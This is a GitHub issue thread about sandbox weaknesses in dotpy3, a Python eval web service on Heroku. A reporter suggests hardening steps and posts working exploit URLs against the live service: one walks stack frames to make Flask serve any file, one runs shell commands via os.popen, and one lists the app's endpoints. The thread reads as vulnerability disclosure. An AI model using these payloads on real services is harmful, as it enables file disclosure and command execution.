### ISSUE TITLE
Sandbox improvements

### ISSUE THREAD

**Issue by b1tninja** [dpk/dotpy3#2]
Understand that offering eval is inherently "dangerous" but the bar could be set a little higher.

Running the evaluator in a separate process for one would make it more difficult to modify the wsgi / flask service. It would prevent accessing the outer frames and thus the code / variables there of.

Not giving the evaluator write permission to the virtual env or fs at large. Perhaps even chroot, or even better use systemd-nspawn or lambda instead of ec2

Perhaps ro the chroot env, maybe squashfs

Exec the code with it's own empty globals and locals or make a custom importer / source code loader

Return to make response should just use stdout/err of the spawned evaluator process, not store stuff in stringio, which allows people to do output.readline=lambda: anything

These just some ideas idk that anyone really cares about the security of this or what people might be using the service for-- but in it's current form it allows for persistent changes to the service and spying/manipulation of other users requests

**Comment by b1tninja** [comment]
Set /static/ to serve any file:
http://dotpy3.herokuapp.com/?sys._getframe().f_back.f_back.f_back.f_back.f_locals[%27self%27].__dict__[%27_static_folder%27]=%27/%27

General bypass of line limitation of output:
http://dotpy3.herokuapp.com/?output.readline=os.popen(%27whoami%27).read

Endpoints of flask/gunicorn:
http://dotpy3.herokuapp.com/?sys._getframe().f_back.f_back.f_back.f_locals[%27self%27].url_map._rules[0].endpoint

**Comment by dpk** [comment]
Since this is run on Heroku, security is their problem, not ours.

**Comment by dpk** [comment]
(Or more precisely expressed — Heroku *is* our sandbox. We don’t really care about people reaching out of the Python environment into the system, because there’s nothing of interest on the system.)

**Comment by b1tninja** [comment]
Well just thought I'd mention the ideas I had, you're free to leave 300gb disk and 60gb open to the internet's will.
